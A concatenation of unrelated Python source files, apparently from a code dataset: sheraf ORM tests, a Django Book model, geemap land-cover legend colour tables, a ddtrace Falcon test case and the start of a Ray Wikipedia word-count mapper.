with pytest.raises(sheraf.ModelObjectNotFoundException):
george.horses.read(name="YO")
def test_read_these(sheraf_database):
with sheraf.connection(commit=True):
george = Cowboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper")
polly = george.horses.create(name="Polly Pumper")
with sheraf.connection():
george = Cowboy.read(george.id)
assert [jolly, polly] == list(
george.horses.read_these(("Jolly Jumper", "Polly Pumper"))
)
def test_delete(sheraf_connection):
george = Cowboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper")
assert george.horses.get() == jolly
assert george.horses.read("Jolly Jumper") == jolly
jolly.delete()
with pytest.raises(sheraf.exceptions.EmptyQuerySetUnpackException):
george.horses.get()
with pytest.raises(sheraf.ModelObjectNotFoundException):
assert george.horses.read("Jolly Jumper")
def test_create_dict(sheraf_connection):
george = Cowboy.create(
name="George",
horses=[dict(name="Jolly Jumper"), dict(name="Polly Pumper")],
)
jolly = george.horses.read("Jolly Jumper")
polly = george.horses.read("Polly Pumper")
assert jolly.mapping == george.mapping["horses"]["name"]["Jolly Jumper"]
assert polly.mapping == george.mapping["horses"]["name"]["Polly Pumper"]
def test_string_model(sheraf_database):
class Horseboy(tests.UUIDAutoModel):
name = sheraf.StringAttribute()
horses = sheraf.IndexedModelAttribute(Horse)
with sheraf.connection():
george = Horseboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper")
assert isinstance(jolly, Horse)
assert isinstance(george.horses.read("Jolly Jumper"), Horse)
def test_count(sheraf_connection):
george = Cowboy.create(name="George")
assert 0 == george.horses.count()
george.horses.create(name="Jolly Jumper")
assert 1 == george.horses.count()
def test_all(sheraf_connection):
george = Cowboy.create(name="George")
assert [] == list(george.horses.all())
jolly = george.horses.create(name="Jolly Jumper")
assert [jolly] == list(george.horses.all())
polly = george.horses.create(name="Polly pumper")
assert [jolly, polly] == list(george.horses.all())
def test_primary_attribute_cannot_be_edited(sheraf_connection):
first_id = str(uuid.uuid4())
second_id = str(uuid.uuid4())
george = Cowboy.create(id=first_id)
assert george.id == first_id
with pytest.raises(sheraf.SherafException):
george.id = second_id
assert george.id == first_id
def test_unchanged_primary_attribute_can_be_assigned(sheraf_connection):
first_id = str(uuid.uuid4())
george = Cowboy.create(id=first_id)
assert george.id == first_id
george.id = first_id
assert george.id == first_id
def test_no_primary_key(sheraf_database):
class HorseWithNoName(sheraf.AttributeModel):
foo = sheraf.SimpleAttribute()
bar = sheraf.SimpleAttribute()
class HorseKeeper(tests.UUIDAutoModel):
horses = sheraf.IndexedModelAttribute(HorseWithNoName)
with sheraf.connection():
keeper = HorseKeeper.create()
with pytest.raises(sheraf.PrimaryKeyException):
keeper.horses.create()
def test_get(sheraf_connection):
george = Cowboy.create(name="George")
with pytest.raises(sheraf.QuerySetUnpackException):
george.horses.get()
jolly = george.horses.create(name="Jolly Jumper")
assert jolly == george.horses.get()
george.horses.create(name="Polly Pumper")
with pytest.raises(sheraf.QuerySetUnpackException):
george.horses.get()
def test_filter(sheraf_connection):
george = Cowboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper", size=5)
polly = george.horses.create(name="Polly Pumper", size=5)
george.horses.create(name="Loosy Lumper", size=4)
assert [jolly, polly] == list(george.horses.filter(size=5))
assert [] == george.horses.filter(size=90000)
def test_order(sheraf_connection):
george = Cowboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper", size=6)
polly = george.horses.create(name="Polly Pumper", size=5)
loosy = george.horses.create(name="Loosy Lumper", size=4)
assert [jolly, polly, loosy] == george.horses.order(size=sheraf.DESC)
assert [loosy, polly, jolly] == george.horses.order(size=sheraf.ASC)
def test_on_creation(sheraf_connection):
class SubModelA(sheraf.AttributeModel):
id = sheraf.StringAttribute().index(primary=True)
trigger = sheraf.BooleanAttribute(default=False)
class SubModelB(sheraf.AttributeModel):
id = sheraf.StringAttribute().index(primary=True)
trigger = sheraf.BooleanAttribute(default=False)
class Model(tests.IntAutoModel):
sub_a = sheraf.IndexedModelAttribute(SubModelA)
sub_b = sheraf.IndexedModelAttribute(SubModelB)
@SubModelA.on_creation
def foo_creation(model):
model.trigger = True
m = Model.create(sub_a=[{"id": "A"}], sub_b=[{"id": "B"}])
assert m.sub_a.read("A").trigger
assert not m.sub_b.read("B").trigger
def test_on_deletion(sheraf_connection):
class SubModel(sheraf.AttributeModel):
id = sheraf.StringAttribute().index(primary=True)
trigger = False
class Model(tests.IntAutoModel):
sub = sheraf.IndexedModelAttribute(SubModel)
@SubModel.on_deletion
def foo_deletion(model):
SubModel.trigger = True
m = Model.create(sub=[{"id": "A"}])
assert not SubModel.trigger
m.sub.read("A").delete()
assert SubModel.trigger
class IndexedHorse(sheraf.AttributeModel):
name = sheraf.StringAttribute().index(primary=True)
size = sheraf.IntegerAttribute()
class IndexedCowboy(tests.UUIDAutoModel):
name = sheraf.StringAttribute()
horses = sheraf.IndexedModelAttribute("IndexedHorse").index(unique=True)
def test_indexation(sheraf_connection):
george = IndexedCowboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper")
polly = george.horses.create(name="Polly Pumper")
george.index_keys("horses") == {
jolly.identifier,
polly.identifier,
}
IndexedCowboy.search_keys(horses=jolly) == jolly.name
IndexedCowboy.search_keys(horses=jolly.name) == jolly.name
horses_table = sheraf_connection.root()[IndexedCowboy.table]["horses"]
assert set(horses_table.keys()) == {
jolly.identifier,
polly.identifier,
}
assert IndexedCowboy.search(horses=jolly.name).get() == george
assert IndexedCowboy.search(horses=jolly).get() == george
george = IndexedCowboy.read(george.id)
assert set(horses_table.keys()) == {
jolly.identifier,
polly.identifier,
}
assert IndexedCowboy.search(horses=jolly.name).get() == george
assert IndexedCowboy.search(horses=jolly).get() == george
dolly = george.horses.create(name="Dolly Dumper")
assert set(horses_table.keys()) == {
jolly.identifier,
polly.identifier,
dolly.identifier,
}
assert IndexedCowboy.search(horses=jolly.name).get() == george
assert IndexedCowboy.search(horses=jolly).get() == george
assert IndexedCowboy.search(horses=dolly.name).get() == george
assert IndexedCowboy.search(horses=dolly).get() == george
class ReverseIndexedHorse(sheraf.AttributeModel):
name = sheraf.StringAttribute().index(primary=True)
size = sheraf.IntegerAttribute()
cowboy = sheraf.ReverseModelAttribute("ReverseIndexedCowboy", "horses")
class ReverseIndexedCowboy(tests.UUIDAutoModel):
name = sheraf.StringAttribute()
horses = sheraf.IndexedModelAttribute("ReverseIndexedHorse").index(unique=True)
def test_reverse_indexation(sheraf_connection):
george = ReverseIndexedCowboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper")
assert jolly.cowboy == george
|
py | b41538ab2ae5e54e586f6fdf660d9b18e895499d | from django.db import models
from django.core.urlresolvers import reverse
#tables
class Book(models.Model):
def get_absolute_url(self):
return reverse('books:details', kwargs={'pk':self.pk})
def __str__(self):
return self.name + '-' + self.author
name = models.CharField(max_length=100)
author = models.CharField(max_length=100)
price = models.CharField(max_length=100)
type = models.CharField(max_length=100)
book_image = models.CharField(max_length=1000)
# second table
# class table_name(models.Model):
|
py | b41538e75e95be34464a490cb0e7b3f78c867550 | """Module of sample legends for some commonly used geospatial datasets.
"""
import os
# Land Cover datasets in Earth Engine https://developers.google.com/earth-engine/datasets/tags/landcover
builtin_legends = {
# National Land Cover Database 2016 (NLCD2016) Legend https://www.mrlc.gov/data/legends/national-land-cover-database-2016-nlcd2016-legend
"NLCD": {
"11 Open Water": "466b9f",
"12 Perennial Ice/Snow": "d1def8",
"21 Developed, Open Space": "dec5c5",
"22 Developed, Low Intensity": "d99282",
"23 Developed, Medium Intensity": "eb0000",
"24 Developed High Intensity": "ab0000",
"31 Barren Land (Rock/Sand/Clay)": "b3ac9f",
"41 Deciduous Forest": "68ab5f",
"42 Evergreen Forest": "1c5f2c",
"43 Mixed Forest": "b5c58f",
"51 Dwarf Scrub": "af963c",
"52 Shrub/Scrub": "ccb879",
"71 Grassland/Herbaceous": "dfdfc2",
"72 Sedge/Herbaceous": "d1d182",
"73 Lichens": "a3cc51",
"74 Moss": "82ba9e",
"81 Pasture/Hay": "dcd939",
"82 Cultivated Crops": "ab6c28",
"90 Woody Wetlands": "b8d9eb",
"95 Emergent Herbaceous Wetlands": "6c9fb8",
},
# https://developers.google.com/earth-engine/datasets/catalog/ESA_WorldCover_v100
"ESA_WorldCover": {
"10 Trees": "006400",
"20 Shrubland": "ffbb22",
"30 Grassland": "ffff4c",
"40 Cropland": "f096ff",
"50 Built-up": "fa0000",
"60 Barren / sparse vegetation": "b4b4b4",
"70 Snow and ice": "f0f0f0",
"80 Open water": "0064c8",
"90 Herbaceous wetland": "0096a0",
"95 Mangroves": "00cf75",
"100 Moss and lichen": "fae6a0",
},
# https://samapriya.github.io/awesome-gee-community-datasets/projects/esrilc2020/
"ESRI_LandCover": {
"Water": "1A5BAB",
"Trees": "358221",
"Grass": "A7D282",
"Flooded Vegetation": "87D19E",
"Crops": "FFDB5C",
"Scrub/Shrub": "EECFA8",
"Built Area": "ED022A",
"Bare Ground": "EDE9E4",
"Snow/Ice": "F2FAFF",
"Clouds": "C8C8C8",
},
# National Wetlands Inventory Legend: https://www.fws.gov/wetlands/data/Mapper-Wetlands-Legend.html
"NWI": {
"Freshwater- Forested and Shrub wetland": (0, 136, 55),
"Freshwater Emergent wetland": (127, 195, 28),
"Freshwater pond": (104, 140, 192),
"Estuarine and Marine wetland": (102, 194, 165),
"Riverine": (1, 144, 191),
"Lakes": (19, 0, 124),
"Estuarine and Marine Deepwater": (0, 124, 136),
"Other Freshwater wetland": (178, 134, 86),
},
# MCD12Q1.051 Land Cover Type Yearly Global 500m https://developers.google.com/earth-engine/datasets/catalog/MODIS_051_MCD12Q1
"MODIS/051/MCD12Q1": {
"0 Water": "1c0dff",
"1 Evergreen needleleaf forest": "05450a",
"2 Evergreen broadleaf forest": "086a10",
"3 Deciduous needleleaf forest": "54a708",
"4 Deciduous broadleaf forest": "78d203",
"5 Mixed forest": "009900",
"6 Closed shrublands": "c6b044",
"7 Open shrublands": "dcd159",
"8 Woody savannas": "dade48",
"9 Savannas": "fbff13",
"10 Grasslands": "b6ff05",
"11 Permanent wetlands": "27ff87",
"12 Croplands": "c24f44",
"13 Urban and built-up": "a5a5a5",
"14 Cropland/natural vegetation mosaic": "ff6d4c",
"15 Snow and ice": "69fff8",
"16 Barren or sparsely vegetated": "f9ffa4",
"254 Unclassified": "ffffff",
},
# MCD12Q1.006 Land Cover Type Yearly Global 500m https://developers.google.com/earth-engine/datasets/catalog/MODIS_006_MCD12Q1
"MODIS/006/MCD12Q1": {
"1 Evergreen needleleaf forest": "05450a",
"2 Evergreen broadleaf forest": "086a10",
"3 Deciduous needleleaf forest": "54a708",
"4 Deciduous broadleaf forest": "78d203",
"5 Mixed forest": "009900",
"6 Closed shrublands": "c6b044",
"7 Open shrublands": "dcd159",
"8 Woody savannas": "dade48",
"9 Savannas": "fbff13",
"10 Grasslands": "b6ff05",
"11 Permanent wetlands": "27ff87",
"12 Croplands": "c24f44",
"13 Urban and built-up": "a5a5a5",
"14 Cropland/natural vegetation mosaic": "ff6d4c",
"15 Snow and ice": "69fff8",
"16 Barren or sparsely vegetated": "f9ffa4",
"17 Water bodies": "1c0dff",
},
# GlobCover: Global Land Cover Map https://developers.google.com/earth-engine/datasets/catalog/ESA_GLOBCOVER_L4_200901_200912_V2_3
"GLOBCOVER": {
"11 Post-flooding or irrigated croplands": "aaefef",
"14 Rainfed croplands": "ffff63",
"20 Mosaic cropland (50-70%) / vegetation (grassland, shrubland, forest) (20-50%)": "dcef63",
"30 Mosaic vegetation (grassland, shrubland, forest) (50-70%) / cropland (20-50%)": "cdcd64",
"40 Closed to open (>15%) broadleaved evergreen and/or semi-deciduous forest (>5m)": "006300",
"50 Closed (>40%) broadleaved deciduous forest (>5m)": "009f00",
"60 Open (15-40%) broadleaved deciduous forest (>5m)": "aac700",
"70 Closed (>40%) needleleaved evergreen forest (>5m)": "003b00",
"90 Open (15-40%) needleleaved deciduous or evergreen forest (>5m)": "286300",
"100 Closed to open (>15%) mixed broadleaved and needleleaved forest (>5m)": "788300",
"110 Mosaic forest-shrubland (50-70%) / grassland (20-50%)": "8d9f00",
"120 Mosaic grassland (50-70%) / forest-shrubland (20-50%)": "bd9500",
"130 Closed to open (>15%) shrubland (<5m)": "956300",
"140 Closed to open (>15%) grassland": "ffb431",
"150 Sparse (>15%) vegetation (woody vegetation, shrubs, grassland)": "ffebae",
"160 Closed (>40%) broadleaved forest regularly flooded - Fresh water": "00785a",
"170 Closed (>40%) broadleaved semi-deciduous and/or evergreen forest regularly flooded - saline water": "009578",
"180 Closed to open (>15%) vegetation (grassland, shrubland, woody vegetation) on regularly flooded or waterlogged soil - fresh, brackish or saline water": "00dc83",
"190 Artificial surfaces and associated areas (urban areas >50%) GLOBCOVER 2009": "c31300",
"200 Bare areas": "fff5d6",
"210 Water bodies": "0046c7",
"220 Permanent snow and ice": "ffffff",
"230 Unclassified": "743411",
},
# Global PALSAR-2/PALSAR Forest/Non-Forest Map https://developers.google.com/earth-engine/datasets/catalog/JAXA_ALOS_PALSAR_YEARLY_FNF
"JAXA/PALSAR": {
"1 Forest": "006400",
"2 Non-Forest": "FEFF99",
"3 Water": "0000FF",
},
# Oxford MAP: Malaria Atlas Project Fractional International Geosphere-Biosphere Programme Landcover https://developers.google.com/earth-engine/datasets/catalog/Oxford_MAP_IGBP_Fractional_Landcover_5km_Annual
"Oxford": {
"0 Water": "032f7e",
"1 Evergreen_Needleleaf_Fores": "02740b",
"2 Evergreen_Broadleaf_Forest": "02740b",
"3 Deciduous_Needleleaf_Forest": "8cf502",
"4 Deciduous_Broadleaf_Forest": "8cf502",
"5 Mixed_Forest": "a4da01",
"6 Closed_Shrublands": "ffbd05",
"7 Open_Shrublands": "ffbd05",
"8 Woody_Savannas": "7a5a02",
"9 Savannas": "f0ff0f",
"10 Grasslands": "869b36",
"11 Permanent_Wetlands": "6091b4",
"12 Croplands": "ff4e4e",
"13 Urban_and_Built-up": "999999",
"14 Cropland_Natural_Vegetation_Mosaic": "ff4e4e",
"15 Snow_and_Ice": "ffffff",
"16 Barren_Or_Sparsely_Vegetated": "feffc0",
"17 Unclassified": "020202",
},
# Canada AAFC Annual Crop Inventory https://developers.google.com/earth-engine/datasets/catalog/AAFC_ACI
"AAFC/ACI": {
"10 Cloud": "000000",
"20 Water": "3333ff",
"30 Exposed Land and Barren": "996666",
"34 Urban and Developed": "cc6699",
"35 Greenhouses": "e1e1e1",
"50 Shrubland": "ffff00",
"80 Wetland": "993399",
"110 Grassland": "cccc00",
"120 Agriculture (undifferentiated)": "cc6600",
"122 Pasture and Forages": "ffcc33",
"130 Too Wet to be Seeded": "7899f6",
"131 Fallow": "ff9900",
"132 Cereals": "660000",
"133 Barley": "dae31d",
"134 Other Grains": "d6cc00",
"135 Millet": "d2db25",
"136 Oats": "d1d52b",
"137 Rye": "cace32",
"138 Spelt": "c3c63a",
"139 Triticale": "b9bc44",
"140 Wheat": "a7b34d",
"141 Switchgrass": "b9c64e",
"142 Sorghum": "999900",
"145 Winter Wheat": "92a55b",
"146 Spring Wheat": "809769",
"147 Corn": "ffff99",
"148 Tobacco": "98887c",
"149 Ginseng": "799b93",
"150 Oilseeds": "5ea263",
"151 Borage": "52ae77",
"152 Camelina": "41bf7a",
"153 Canola and Rapeseed": "d6ff70",
"154 Flaxseed": "8c8cff",
"155 Mustard": "d6cc00",
"156 Safflower": "ff7f00",
"157 Sunflower": "315491",
"158 Soybeans": "cc9933",
"160 Pulses": "896e43",
"162 Peas": "8f6c3d",
"167 Beans": "82654a",
"174 Lentils": "b85900",
"175 Vegetables": "b74b15",
"176 Tomatoes": "ff8a8a",
"177 Potatoes": "ffcccc",
"178 Sugarbeets": "6f55ca",
"179 Other Vegetables": "ffccff",
"180 Fruits": "dc5424",
"181 Berries": "d05a30",
"182 Blueberry": "d20000",
"183 Cranberry": "cc0000",
"185 Other Berry": "dc3200",
"188 Orchards": "ff6666",
"189 Other Fruits": "c5453b",
"190 Vineyards": "7442bd",
"191 Hops": "ffcccc",
"192 Sod": "b5fb05",
"193 Herbs": "ccff05",
"194 Nursery": "07f98c",
"195 Buckwheat": "00ffcc",
"196 Canaryseed": "cc33cc",
"197 Hemp": "8e7672",
"198 Vetch": "b1954f",
"199 Other Crops": "749a66",
"200 Forest (undifferentiated)": "009900",
"210 Coniferous": "006600",
"220 Broadleaf": "00cc00",
"230 Mixedwood": "cc9900",
},
# Copernicus CORINE Land Cover https://developers.google.com/earth-engine/datasets/catalog/COPERNICUS_CORINE_V20_100m
"COPERNICUS/CORINE/V20/100m": {
"111 Artificial surfaces > Urban fabric > Continuous urban fabric": "E6004D",
"112 Artificial surfaces > Urban fabric > Discontinuous urban fabric": "FF0000",
"121 Artificial surfaces > Industrial, commercial, and transport units > Industrial or commercial units": "CC4DF2",
"122 Artificial surfaces > Industrial, commercial, and transport units > Road and rail networks and associated land": "CC0000",
"123 Artificial surfaces > Industrial, commercial, and transport units > Port areas": "E6CCCC",
"124 Artificial surfaces > Industrial, commercial, and transport units > Airports": "E6CCE6",
"131 Artificial surfaces > Mine, dump, and construction sites > Mineral extraction sites": "A600CC",
"132 Artificial surfaces > Mine, dump, and construction sites > Dump sites": "A64DCC",
"133 Artificial surfaces > Mine, dump, and construction sites > Construction sites": "FF4DFF",
"141 Artificial surfaces > Artificial, non-agricultural vegetated areas > Green urban areas": "FFA6FF",
"142 Artificial surfaces > Artificial, non-agricultural vegetated areas > Sport and leisure facilities": "FFE6FF",
"211 Agricultural areas > Arable land > Non-irrigated arable land": "FFFFA8",
"212 Agricultural areas > Arable land > Permanently irrigated land": "FFFF00",
"213 Agricultural areas > Arable land > Rice fields": "E6E600",
"221 Agricultural areas > Permanent crops > Vineyards": "E68000",
"222 Agricultural areas > Permanent crops > Fruit trees and berry plantations": "F2A64D",
"223 Agricultural areas > Permanent crops > Olive groves": "E6A600",
"231 Agricultural areas > Pastures > Pastures": "E6E64D",
"241 Agricultural areas > Heterogeneous agricultural areas > Annual crops associated with permanent crops": "FFE6A6",
"242 Agricultural areas > Heterogeneous agricultural areas > Complex cultivation patterns": "FFE64D",
"243 Agricultural areas > Heterogeneous agricultural areas > Land principally occupied by agriculture, with significant areas of natural vegetation": "E6CC4D",
"244 Agricultural areas > Heterogeneous agricultural areas > Agro-forestry areas": "F2CCA6",
"311 Forest and semi natural areas > Forests > Broad-leaved forest": "80FF00",
"312 Forest and semi natural areas > Forests > Coniferous forest": "00A600",
"313 Forest and semi natural areas > Forests > Mixed forest": "4DFF00",
"321 Forest and semi natural areas > Scrub and/or herbaceous vegetation associations > Natural grasslands": "CCF24D",
"322 Forest and semi natural areas > Scrub and/or herbaceous vegetation associations > Moors and heathland": "A6FF80",
"323 Forest and semi natural areas > Scrub and/or herbaceous vegetation associations > Sclerophyllous vegetation": "A6E64D",
"324 Forest and semi natural areas > Scrub and/or herbaceous vegetation associations > Transitional woodland-shrub": "A6F200",
"331 Forest and semi natural areas > Open spaces with little or no vegetation > Beaches, dunes, sands": "E6E6E6",
"332 Forest and semi natural areas > Open spaces with little or no vegetation > Bare rocks": "CCCCCC",
"333 Forest and semi natural areas > Open spaces with little or no vegetation > Sparsely vegetated areas": "CCFFCC",
"334 Forest and semi natural areas > Open spaces with little or no vegetation > Burnt areas": "000000",
"335 Forest and semi natural areas > Open spaces with little or no vegetation > Glaciers and perpetual snow": "A6E6CC",
"411 Wetlands > Inland wetlands > Inland marshes": "A6A6FF",
"412 Wetlands > Inland wetlands > Peat bogs": "4D4DFF",
"421 Wetlands > Maritime wetlands > Salt marshes": "CCCCFF",
"422 Wetlands > Maritime wetlands > Salines": "E6E6FF",
"423 Wetlands > Maritime wetlands > Intertidal flats": "A6A6E6",
"511 Water bodies > Inland waters > Water courses": "00CCF2",
"512 Water bodies > Inland waters > Water bodies": "80F2E6",
"521 Water bodies > Marine waters > Coastal lagoons": "00FFA6",
"522 Water bodies > Marine waters > Estuaries": "A6FFE6",
"523 Water bodies > Marine waters > Sea and ocean": "E6F2FF",
},
# Copernicus Global Land Cover Layers: CGLS-LC100 collection 2 https://developers.google.com/earth-engine/datasets/catalog/COPERNICUS_Landcover_100m_Proba-V_Global
"COPERNICUS/Landcover/100m/Proba-V/Global": {
"0 Unknown": "282828",
"20 Shrubs. Woody perennial plants with persistent and woody stems and without any defined main stem being less than 5 m tall. The shrub foliage can be either evergreen or deciduous.": "FFBB22",
"30 Herbaceous vegetation. Plants without persistent stem or shoots above ground and lacking definite firm structure. Tree and shrub cover is less than 10 %.": "FFFF4C",
"40 Cultivated and managed vegetation / agriculture. Lands covered with temporary crops followed by harvest and a bare soil period (e.g., single and multiple cropping systems). Note that perennial woody crops will be classified as the appropriate forest or shrub land cover type.": "F096FF",
"50 Urban / built up. Land covered by buildings and other man-made structures.": "FA0000",
"60 Bare / sparse vegetation. Lands with exposed soil, sand, or rocks and never has more than 10 % vegetated cover during any time of the year.": "B4B4B4",
"70 Snow and ice. Lands under snow or ice cover throughout the year.": "F0F0F0",
"80 Permanent water bodies. Lakes, reservoirs, and rivers. Can be either fresh or salt-water bodies.": "0032C8",
"90 Herbaceous wetland. Lands with a permanent mixture of water and herbaceous or woody vegetation. The vegetation can be present in either salt, brackish, or fresh water.": "0096A0",
"100 Moss and lichen.": "FAE6A0",
"111 Closed forest, evergreen needle leaf. Tree canopy >70 %, almost all needle leaf trees remain green all year. Canopy is never without green foliage.": "58481F",
"112 Closed forest, evergreen broad leaf. Tree canopy >70 %, almost all broadleaf trees remain green year round. Canopy is never without green foliage.": "009900",
"113 Closed forest, deciduous needle leaf. Tree canopy >70 %, consists of seasonal needle leaf tree communities with an annual cycle of leaf-on and leaf-off periods.": "70663E",
"114 Closed forest, deciduous broad leaf. Tree canopy >70 %, consists of seasonal broadleaf tree communities with an annual cycle of leaf-on and leaf-off periods.": "00CC00",
"115 Closed forest, mixed.": "4E751F",
"116 Closed forest, not matching any of the other definitions.": "007800",
"121 Open forest, evergreen needle leaf. Top layer- trees 15-70 % and second layer- mixed of shrubs and grassland, almost all needle leaf trees remain green all year. Canopy is never without green foliage.": "666000",
"122 Open forest, evergreen broad leaf. Top layer- trees 15-70 % and second layer- mixed of shrubs and grassland, almost all broadleaf trees remain green year round. Canopy is never without green foliage.": "8DB400",
"123 Open forest, deciduous needle leaf. Top layer- trees 15-70 % and second layer- mixed of shrubs and grassland, consists of seasonal needle leaf tree communities with an annual cycle of leaf-on and leaf-off periods.": "8D7400",
"124 Open forest, deciduous broad leaf. Top layer- trees 15-70 % and second layer- mixed of shrubs and grassland, consists of seasonal broadleaf tree communities with an annual cycle of leaf-on and leaf-off periods.": "A0DC00",
"125 Open forest, mixed.": "929900",
"126 Open forest, not matching any of the other definitions.": "648C00",
"200 Oceans, seas. Can be either fresh or salt-water bodies.": "000080",
},
# USDA NASS Cropland Data Layers https://developers.google.com/earth-engine/datasets/catalog/USDA_NASS_CDL
"USDA/NASS/CDL": {
"1 Corn": "ffd300",
"2 Cotton": "ff2626",
"3 Rice": "00a8e2",
"4 Sorghum": "ff9e0a",
"5 Soybeans": "267000",
"6 Sunflower": "ffff00",
"10 Peanuts": "70a500",
"11 Tobacco": "00af49",
"12 Sweet Corn": "dda50a",
"13 Pop or Orn Corn": "dda50a",
"14 Mint": "7cd3ff",
"21 Barley": "e2007c",
"22 Durum Wheat": "896054",
"23 Spring Wheat": "d8b56b",
"24 Winter Wheat": "a57000",
"25 Other Small Grains": "d69ebc",
"26 Dbl Crop WinWht/Soybeans": "707000",
"27 Rye": "aa007c",
"28 Oats": "a05989",
"29 Millet": "700049",
"30 Speltz": "d69ebc",
"31 Canola": "d1ff00",
"32 Flaxseed": "7c99ff",
"33 Safflower": "d6d600",
"34 Rape Seed": "d1ff00",
"35 Mustard": "00af49",
"36 Alfalfa": "ffa5e2",
"37 Other Hay/Non Alfalfa": "a5f28c",
"38 Camelina": "00af49",
"39 Buckwheat": "d69ebc",
"41 Sugarbeets": "a800e2",
"42 Dry Beans": "a50000",
"43 Potatoes": "702600",
"44 Other Crops": "00af49",
"45 Sugarcane": "af7cff",
"46 Sweet Potatoes": "702600",
"47 Misc Vegs & Fruits": "ff6666",
"48 Watermelons": "ff6666",
"49 Onions": "ffcc66",
"50 Cucumbers": "ff6666",
"51 Chick Peas": "00af49",
"52 Lentils": "00ddaf",
"53 Peas": "54ff00",
"54 Tomatoes": "f2a377",
"55 Caneberries": "ff6666",
"56 Hops": "00af49",
"57 Herbs": "7cd3ff",
"58 Clover/Wildflowers": "e8bfff",
"59 Sod/Grass Seed": "afffdd",
"60 Switchgrass": "00af49",
"61 Fallow/Idle Cropland": "bfbf77",
"63 Forest": "93cc93",
"64 Shrubland": "c6d69e",
"65 Barren": "ccbfa3",
"66 Cherries": "ff00ff",
"67 Peaches": "ff8eaa",
"68 Apples": "ba004f",
"69 Grapes": "704489",
"70 Christmas Trees": "007777",
"71 Other Tree Crops": "af9970",
"72 Citrus": "ffff7c",
"74 Pecans": "b5705b",
"75 Almonds": "00a582",
"76 Walnuts": "e8d6af",
"77 Pears": "af9970",
"81 Clouds/No Data": "f2f2f2",
"82 Developed": "999999",
"83 Water": "4970a3",
"87 Wetlands": "7cafaf",
"88 Nonag/Undefined": "e8ffbf",
"92 Aquaculture": "00ffff",
"111 Open Water": "4970a3",
"112 Perennial Ice/Snow": "d3e2f9",
"121 Developed/Open Space": "999999",
"122 Developed/Low Intensity": "999999",
"123 Developed/Med Intensity": "999999",
"124 Developed/High Intensity": "999999",
"131 Barren": "ccbfa3",
"141 Deciduous Forest": "93cc93",
"142 Evergreen Forest": "93cc93",
"143 Mixed Forest": "93cc93",
"152 Shrubland": "c6d69e",
"176 Grassland/Pasture": "e8ffbf",
"190 Woody Wetlands": "7cafaf",
"195 Herbaceous Wetlands": "7cafaf",
"204 Pistachios": "00ff8c",
"205 Triticale": "d69ebc",
"206 Carrots": "ff6666",
"207 Asparagus": "ff6666",
"208 Garlic": "ff6666",
"209 Cantaloupes": "ff6666",
"210 Prunes": "ff8eaa",
"211 Olives": "334933",
"212 Oranges": "e27026",
"213 Honeydew Melons": "ff6666",
"214 Broccoli": "ff6666",
"216 Peppers": "ff6666",
"217 Pomegranates": "af9970",
"218 Nectarines": "ff8eaa",
"219 Greens": "ff6666",
"220 Plums": "ff8eaa",
"221 Strawberries": "ff6666",
"222 Squash": "ff6666",
"223 Apricots": "ff8eaa",
"224 Vetch": "00af49",
"225 Dbl Crop WinWht/Corn": "ffd300",
"226 Dbl Crop Oats/Corn": "ffd300",
"227 Lettuce": "ff6666",
"229 Pumpkins": "ff6666",
"230 Dbl Crop Lettuce/Durum Wht": "896054",
"231 Dbl Crop Lettuce/Cantaloupe": "ff6666",
"232 Dbl Crop Lettuce/Cotton": "ff2626",
"233 Dbl Crop Lettuce/Barley": "e2007c",
"234 Dbl Crop Durum Wht/Sorghum": "ff9e0a",
"235 Dbl Crop Barley/Sorghum": "ff9e0a",
"236 Dbl Crop WinWht/Sorghum": "a57000",
"237 Dbl Crop Barley/Corn": "ffd300",
"238 Dbl Crop WinWht/Cotton": "a57000",
"239 Dbl Crop Soybeans/Cotton": "267000",
"240 Dbl Crop Soybeans/Oats": "267000",
"241 Dbl Crop Corn/Soybeans": "ffd300",
"242 Blueberries": "000099",
"243 Cabbage": "ff6666",
"244 Cauliflower": "ff6666",
"245 Celery": "ff6666",
"246 Radishes": "ff6666",
"247 Turnips": "ff6666",
"248 Eggplants": "ff6666",
"249 Gourds": "ff6666",
"250 Cranberries": "ff6666",
"254 Dbl Crop Barley/Soybeans": "267000",
},
}
def ee_table_to_legend(in_table, out_file):
"""Converts an Earth Engine color table to a dictionary
Args:
in_table (str): The input file path (*.txt) to the Earth Engine color table.
out_file (str): The output file path (*.txt) to the legend dictionary.
"""
# pkg_dir = os.path.dirname(pkg_resources.resource_filename("geemap", "geemap.py"))
# ee_legend_table = os.path.join(pkg_dir, "data/template/ee_legend_table.txt")
if not os.path.exists(in_table):
print("The class table does not exist.")
out_file = os.path.abspath(out_file)
if not os.path.exists(os.path.dirname(out_file)):
os.makedirs(os.path.dirname(out_file))
legend_dict = {}
with open(in_table) as f:
lines = f.readlines()
for index, line in enumerate(lines):
if index > 0:
items = line.split("\t")
items = [item.strip() for item in items]
color = items[1]
key = items[0] + " " + items[2]
legend_dict[key] = color
out_lines = []
out_lines.append("{\n")
for key in legend_dict.keys():
line = "\t'{}': '{}',\n".format(key, legend_dict[key])
out_lines.append(line)
out_lines[-1] = out_lines[-1].rstrip()[:-1] + "\n"
out_lines.append("}\n")
with open(out_file, "w") as f:
f.writelines(out_lines)
|
py | b4153994924f82885b8d2c278f9add38709bc455 | from falcon import testing
from ddtrace.contrib.falcon.patch import FALCON_VERSION
from tests.utils import TracerTestCase
from .app import get_app
from .test_suite import FalconTestCase
class MiddlewareTestCase(TracerTestCase, testing.TestCase, FalconTestCase):
"""Executes tests using the manual instrumentation so a middleware
is explicitly added.
"""
def setUp(self):
super(MiddlewareTestCase, self).setUp()
# build a test app with a dummy tracer
self._service = "falcon"
self.api = get_app(tracer=self.tracer)
if FALCON_VERSION >= (2, 0, 0):
self.client = testing.TestClient(self.api)
else:
self.client = self
|
py | b4153af3d95c497151a9c6b1b11ade85dce5773b | import argparse
from collections import Counter, defaultdict
import heapq
import numpy as np
import os
import ray
import wikipedia
parser = argparse.ArgumentParser()
parser.add_argument("--num-mappers",
help="number of mapper actors used", default=3)
parser.add_argument("--num-reducers",
help="number of reducer actors used", default=4)
@ray.remote
class Mapper(object):
def __init__(self, title_stream):
self.title_stream = title_stream
self.num_articles_processed = 0
self.articles = []
self.word_counts = []
def get_new_article(self):
# Get the next wikipedia article.
article = wikipedia.page(self.title_stream.next()).content
# Count the words and store the result.
